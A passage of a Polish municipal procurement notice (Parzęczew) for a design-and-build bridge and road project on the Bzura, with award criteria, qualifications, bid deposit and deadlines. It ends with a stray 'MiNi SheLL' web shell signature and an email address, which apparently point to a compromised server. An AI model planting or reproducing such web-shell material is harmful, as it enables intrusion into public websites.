class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2 zadanie pn. Przebudowa mostu na rzece Bzurze oraz kontynuacja przebudowy drogi<br/>gminnej nr 120277E w systemie zaprojektuj i wybuduj.<br/>W ramach zamówienia należy opracować projekt budowlany oraz wykonać roboty budowlane .<br/>Zamawiający posiada n/w programy funkcjonalno-użytkowe (dalej PFU), które określają<br/>wszystkie wymagania dotyczące sporządzenia projektu budowlanego, a także wykonania robót<br/>budowlanych w zakresie budowy infrastruktury drogowej z uwzględnieniem infrastruktury<br/>stanowiącej własność gestorów zewnętrznych:<br/>• PFU – przebudowa drogi gminnej nr 120276E w m. Sokola Góra, gmina Parzęczew<br/>• PFU – przebudowa drogi gminnej nr 120277E w m. Nowomłyny, gmina Parzęczew<br/>• PFU – Przebudowa mostu na rzece Bzurze oraz kontynuacja przebudowy drogi gminnej<br/>nr 120277E<br/>Natomiast na odcinek drogi Tkaczewska Góra – Pustkowa Góra, Zamawiający posiada projekt<br/>budowlany, bez pozwolenia na budowę – dostosowanie dokumentacji oraz uzyskanie<br/>pozwolenia na budowę należy do Wykonawcy. Zamawiający zwraca uwagę, że przy realizacji<br/>zadania Przebudowa mostu na rzece Bzurze oraz kontynuacja przebudowy drogi gminnej nr<br/>120277E należy uzyskać m. in. decyzję ZRID.<br/>Zamawiający posiada mapy do celów projektowych w skali 1:500, dla wszystkich objętych<br/>zamówieniem odcinków dróg – przyjęte do państwowego zasobu geodezyjno-kartograficznego<br/>w dniach 04.11.2020r., 20.12.2021r., 21.12.2021r. – w załączeniu.<br/>Zakres rzeczowy formuła „ZAPROJEKTUJ” obejmuje m.in.:<br/>Opracowanie projektu budowlanego dla w/w części wraz z uzyskaniem wszelkich uzgodnień,<br/>analiz, map, opracowań pomocniczych oraz niezbędnych decyzji.<br/>Wykonawca zobowiązany jest do uzyskania akceptacji Zamawiającego co do opracowanego<br/>Projektu budowlanego. Po zaakceptowaniu projektu przez Zamawiającego a przed<br/>przystąpieniem do robót budowlanych Wykonawca zobowiązany jest uzyskać na rzecz<br/>Zamawiającego decyzji administracyjnych umożliwiających rozpoczęcie i realizację robót lub<br/>zgłoszenia robót nie wymagających uzyskania takich decyzji.<br/>Całość dokumentacji należy wykonać zgodnie z przepisami Prawa budowlanego (w tym<br/>z przepisami wykonawczymi) oraz uzgodnić z Zamawiającym przed złożeniem ich do właściwych<br/>organów zatwierdzających i decyzyjnych.<br/>Dokumentacja projektowa powinna bazować na najnowszych rozwiązaniach technicznych<br/>minimalizujących koszty eksploatacji z uwzględnieniem założeń programu funkcjonalnoużytkowego.<br/>Uzgodnioną z Zamawiającym dokumentację należy przedłożyć w wersji elektronicznej<br/>Zamawiają-cemu w formacie zapisu .DOC, .PDF, .DXF, .DWG.<br/>Wykonawca, na każdym etapie opracowania dokumentacji, zobowiązany jest do konsultacji<br/>z przedstawicielami Zamawiającego istotnych, mających wpływ na koszty elementów, jakości<br/>i niezawodności funkcjonowania obiektów po ich zrealizowaniu, rozwiązań funkcjonalnych<br/>i konstrukcyjnych. Po zakończeniu projektowania, a przed złożeniem kompletnej dokumentacji<br/>w celu uzyskania niezbędnych decyzji administracyjnych, Wykonawca przedłoży taką<br/>dokumenta-cję Zamawiającemu, celem uzyskania pisemnego jej uzgodnienia.<br/>W ramach zamówienia Wykonawca przeniesie na rzecz Zamawiającego autorskie prawa<br/>majątkowe oraz prawo zezwalania na wykonywanie zależnego prawa autorskiego do przedmiotu<br/>zamówienia obejmującego wszystkie pola eksploatacji wskazane w art. 50 ustawy z dnia 4<br/>lutego 1994 r.<br/>o prawie autorskim i prawach pokrewnych (tj. Dz. U. z 2021 r. poz. 1062 ze zm.), co upoważnia<br/>Zamawiającego do wykorzystywania przedmiotu umowy na wszelkich polach eksploatacji niezbędnych z uwagi na jego przeznaczenie. Wykonawca wyraża zgodę na dokonywanie zmian<br/>w dokumentacji. Przeniesienie praw autorskich nie jest ograniczone czasowo ani terytorialnie.<br/>Wykonywanie czynności nadzoru autorskiego przez projektanta nad realizacją projektu wchodzi<br/>w zakres zamówienia.<br/>Zakres rzeczowy formuła „WYBUDUJ” obejmuje m.in.:<br/>- wykonanie wszelkich niezbędnych prac rozbiórkowych i demontażowych oraz wykonanie robót<br/>budowlanych zgodnie z powstałym i zatwierdzonym projektem budowalnym, warunkami<br/>określonymi w pozwoleniu na budowę (jeżeli takie jest wymagane) oraz innych decyzjach<br/>administracyjnych, przestrzegając zasad sztuki budowlanej i praktyki budowlanej, oraz zaleceń<br/>Za-mawiającego, a także zgodnie z obowiązującymi przepisami prawa;<br/>- sporządzenie i złożenie w terminie 14 dni przed rozpoczęciem robót „Harmonogramu Realizacji<br/>Robót wraz z kosztorysem”, i przedstawienie do zatwierdzenia przez Zamawiającego.<br/>Zamawiający zastrzega sobie prawo do wprowadzenia zmian w przedłożonym Harmonogramie<br/>Realizacji Robót. Złożenie przedmiotowego kosztorysu nie zmienia formy wynagrodzenia, jaką<br/>jest ryczałt;<br/>- zorganizowanie i przeprowadzenie niezbędnych prób, badań, odbiorów i zawiadomień<br/>w Powiatowym Inspektoracie Nadzoru Budowlanego.<br/>Przed podpisaniem umowy w przedmiotowym postępowaniu, wyłoniony Wykonawca złoży<br/>wypełniony i zatwierdzony przez Zamawiającego harmonogram rzeczowo-finansowy,<br/>stanowiący załącznik do tej umowy (na etapie składania ofert dokument nie jest składany), z<br/>podziałem\<br/>na dokumentację projektową i roboty budowlane.<br/>Wykonawcy są zobowiązani do kierowania się odpowiednimi normami z zakresu ochrony<br/>środowiska w trakcie wszystkich prac oraz ograniczenia do minimum szkodliwego oddziaływania<br/>w roślinności, glebie, wodach gruntowych, wodach powierzchniowych oraz w krajobrazie.<br/>Wykonawca jest zobowiązany zrealizować przedmiot zamówienia, spełniając wymagania ustawy<br/>Prawo budowlane oraz innych ustaw i rozporządzeń, Polskich norm, zasad wiedzy technicznej<br/>i sztuki budowlanej.<br/>Roboty budowlane należy wykonać zgodnie z obowiązującymi normami, sztuką budowlaną,<br/>przepisami BHP, ppoż. oraz poleceniami inspektora nadzoru inwestorskiego. Wykonawca<br/>na dzień odbioru robót przedstawi inwentaryzację geodezyjną powykonawczą złożoną w<br/>państwowym zasobie geodezyjno – kartograficznym.<br/>Wykonawca jest zobowiązany zrealizować przedmiot zamówienia z materiałów nowych,<br/>nieużywanych, których jakość winna odpowiadać wymogom wyrobów dopuszczonych<br/>do stosowania w budownictwie, zgodnie z art. 10 ustawy Prawo budowlane oraz wymaganiom<br/>określonym w projekcie budowlanym. Wykonawca bierze całkowitą odpowiedzialność<br/>za dostarczone przez siebie materiały, użyte do realizacji przedmiotu umowy. Wykonawca<br/>ma obowiązek na każde żądanie Zamawiającego przedstawić świadectwo jakości materiału,<br/>certyfikat na znak bezpieczeństwa, deklarację zgodności z Polską Normą.<br/>Okres gwarancji, którą udzieli Wykonawca na przedmiot zamówienia wynosi co najmniej<br/>36 miesięcy.<br/>Jeżeli warunki gwarancji jakości udzielonej przez producenta materiałów i urządzeń przewidują<br/>dłuższy okres gwarancji jakości niż gwarancja udzielona przez Wykonawcę – obowiązuje okres<br/>gwarancji w wymiarze równym okresowi gwarancji producenta.<br/>Wykonawca zobowiązany jest wskazać okres gwarancji w Formularzu Ofertowym stanowiącym<br/>załącznik nr 1 do SWZ. Szczegółowy opis w zakresie okresu gwarancji znajduje się w dziale XV – Kryterium Nr 2.<br/>2. Wykonawca na własny koszt zatrudni kierownika budowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45221111-3 - Roboty budowlane w zakresie mostów drogowych</p> <p class="mb-0">45230000-8 - Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei; wyrównywanie terenu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">20 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocenie podlegają nieodrzucone oferty według kryteriów określonych w SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/><br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej,<br/>o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/> 3) sytuacji ekonomicznej lub finansowej: <br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>4) zdolności technicznej lub zawodowej:<br/>a) Warunek zdolności technicznej zostanie uznany za spełniony jeżeli Wykonawca wykaże że:<br/>Dotyczy części 1:<br/>- w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie, zgodnie<br/>z przepisami prawa budowlanego i prawidłowo ukończył minimum dwie roboty budowlane (na podstawie dwóch odrębnych umów), polegające budowie lub rozbudowie lub przebudowie drogi, w zakresie których znajdowało się wykonanie nawierzchni bitumicznej przy czym wartość netto jednej z tych robót wynosiła co najmniej 500 000,00 PLN.<br/><br/>Dotyczy części 2:<br/>- w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie, zgodnie<br/>z przepisami prawa budowlanego i prawidłowo ukończył minimum dwie roboty budowlane (na podstawie dwóch odrębnych umów), polegające budowie lub rozbudowie lub przebudowie lub odbudowie mostu, w zakresie których znajdowało się również wykonanie nawierzchni bitumicznej przy czym wartość netto jednej z tych robót wynosiła co najmniej<br/>1 000 000,00 PLN.<br/><br/>W przypadku składania oferty na obie części należy wykazać spełnienie warunku<br/>dla części 1 i części 2.<br/><br/>Dla potrzeb oceny spełniania warunku określonego powyżej, jeśli wartości zostaną podane w walutach innych niż PLN, Zamawiający przyjmie średni kurs PLN do tej waluty podawany przez NBP (Tabela A kursów średnich walut obcych) na dzień opublikowania ogłoszenia<br/>o zamówieniu w Biuletynie Zamówień Publicznych.<br/>Uwaga<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wykonywanych wspólnie z innymi Wykonawcami, wykaz winien zawierać roboty, w których wykonaniu Wykonawca bezpośrednio uczestniczył.<br/>Jeżeli Wykonawca wykazuje doświadczenie nabyte w ramach kontraktu (zamówienia/umowy) realizowanego przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum), Zamawiający nie dopuszcza by Wykonawca polegał na doświadczeniu grupy Wykonawców, której był członkiem, jeżeli faktycznie i konkretnie nie wykonywał wykazywanego zakresu prac. Zamawiający zastrzega możliwość zwrócenia się do Wykonawcy o wyjaśnienia<br/>w zakresie faktycznie konkretnie wykonywanego zakresu prac oraz przedstawienia stosownych dowodów np. umowy konsorcjum, z której wynika zakres obowiązków<br/><br/>b)	Warunek zdolności zawodowej zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował co najmniej:<br/>Dotyczy części 1:<br/>- jedną osobą, która posiada uprawnienia do projektowania w specjalności inżynieryjnej drogowej,<br/>- jedną osobą, która będzie uczestniczyć w wykonywaniu zamówienia pełniącą funkcję kierownika budowy, posiadającego uprawnienia do kierowania robotami budowlanymi<br/>w specjalności inżynieryjnej drogowej.<br/><br/>Dotyczy części 2:<br/>- jedną osobą, która posiada uprawnienia do projektowania w specjalności inżynieryjnej mostowej i drogowej,<br/>- jedną osobą, która będzie uczestniczyć w wykonywaniu zamówienia pełniącą funkcję kierownika budowy, posiadającego uprawnienia do kierowania robotami budowlanymi<br/>w specjalności inżynieryjnej mostowej i drogowej.<br/><br/>W przypadku składania oferty na obie części należy wykazać spełnienie warunku<br/>dla części 1 i części 2.<br/>Dopuszcza się łączenie kilku funkcji przez jedną osobę w przypadku posiadania kilku rodzajów uprawnień lub kwalifikacji.<br/><br/>Uwagi:<br/>1)	Uprawnienia, o których mowa powyżej powinny być zgodne z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2021 r. poz. 2351) lub ważne odpowiadające im kwalifikacje, nadane na podstawie wcześniej obowiązujących przepisów upoważniające do kierowania robotami<br/>budowlanymi w zakresie objętym niniejszym zamówieniem.<br/>2)	W przypadku Wykonawców zagranicznych, dopuszcza się również kwalifikacje, zdobyte<br/> w innych państwach, na zasadach określonych w art.12 a ustawy Prawo budowlane,<br/> z uwzględnieniem postanowień ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 2020, poz. 220).<br/>3)	W przypadku osób będących obywatelami państw członkowskich UE, Konfederacji Szwajcarskiej lub państw członkowskich (EFTA)-stron umowy o Europejskim Obszarze Gospodarczym – prawo do wykonywania samodzielnych funkcji technicznych w budownictwie na terytorium RP winno być potwierdzone odpowiednią decyzją o uznaniu kwalifikacji zawodowych lub prawa do świadczenia usług transgranicznych.<br/>4)	Dopuszcza się uprawnienia równoważne (w zakresie koniecznym do wykonania przedmiotu zamówienia) – dla osób, które posiadają uprawnienia uzyskane przed dniem wejścia w życie ustawy z dnia 7 lipca 1994 r. Prawo budowlane lub stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie i zachowały uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust 1. ustawy Pzp, w zakresie podstaw wykluczenia postępowania wskazanych przez Zamawiającego - zgodnie z załącznikiem 8 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty - warunki zostały określone w Rozdziale VI pkt 2 ppkt. 4 lit a specyfikacji- załącznik nr 6 do SWZ<br/>2)	wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, <br/>w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją<br/>o podstawie do dysponowania tymi osobami - warunki określone zostały w Rozdziale VI pkt 2 ppkt. 4 lit b specyfikacji - załącznik nr 7 do SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca jest zobowiązany do wniesienia wadium w wysokości:<br/>Dla części nr 1: 100 000,00 PLN (słownie: sto tysięcy złotych)<br/>Dla części nr 2: 25 000,00 PLN (słownie: dwadzieścia pięć tysięcy złotych) <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1)	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo<br/>do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>2)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden<br/>z nich nie może podlegać wykluczeniu na podstawie art. 108 ust. 1 ustawy Pzp, natomiast spełnianie warunków udziału w postępowaniu Wykonawcy wykazują zgodnie z rozdziałem VI SWZ.<br/>3)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w ust. 1 SWZ niniejszego rozdziału, składa każdy<br/>z Wykonawców. Oświadczenia te wstępnie potwierdzają spełnianie warunków udziału<br/>w postępowaniu oraz brak podstaw do wykluczenia w zakresie, w którym każdy<br/>z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw<br/>do wykluczenia.<br/>4)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane wykonują poszczególni Wykonawcy (wzór stanowi załącznik nr 4 do SWZ) <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z załącznikiem nr 5 do SWZ - projekt umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-02-15 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy umieścić na platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/parzeczew</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-02-15 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-03-16</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com